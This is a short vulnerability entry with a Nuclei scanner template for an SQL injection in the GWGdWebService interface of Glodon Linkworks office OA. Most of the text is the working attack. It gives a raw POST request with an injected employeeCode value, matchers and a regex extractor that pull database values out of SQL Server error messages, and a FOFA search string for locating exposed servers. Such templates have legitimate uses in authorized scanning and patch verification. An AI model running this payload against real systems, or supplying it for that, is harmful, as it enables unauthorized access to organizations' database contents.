漏洞描述
There is a SQL injection vulnerability in the GWGdWebService interface of Glodon Linkworks office OA. Sensitive information in the database can be obtained after sending a request package.
glodon-linkworks-sqli: Glodon Linkworks GWGdWebService - SQL injection
PoC代码[已公开]
id: glodon-linkworks-sqli
info:
name: Glodon Linkworks GWGdWebService - SQL injection
author: DhiyaneshDK
severity: high
description: |
There is a SQL injection vulnerability in the GWGdWebService interface of Glodon Linkworks office OA. Sensitive information in the database can be obtained after sending a request package.
reference:
- https://github.com/zan8in/pocwiki/blob/main/%E5%B9%BF%E8%81%94%E8%BE%BE-linkworks-gwgdwebservice%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: banner="Services/Identification/login.ashx"
tags: glodon,linkworks,sqli,vuln
http:
- raw:
- |
POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
employeeCode=1'-1/user--'&EncryptData=1
matchers:
- type: dsl
dsl:
- 'status_code==500'
- 'contains_any(header, "text/html", "text/plain")'
- 'contains_all(body, "在将 nvarchar 值", "转换成数据类型 int 时失败")'
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- '在将 nvarchar 值 '(.*)' 转换成数据类型 int 时失败。'
# digest: 490a0046304402201777948e3667ed1d8c89d01dba6c1fd6e9ac6ff66efa0188ef14f6c44366e1510220253b1f605760ec6ad5994d17bf4452dbc5bb90daee20c0bb36ebac3a7d3fded8:922c64590222798bb761d5b6d8e72950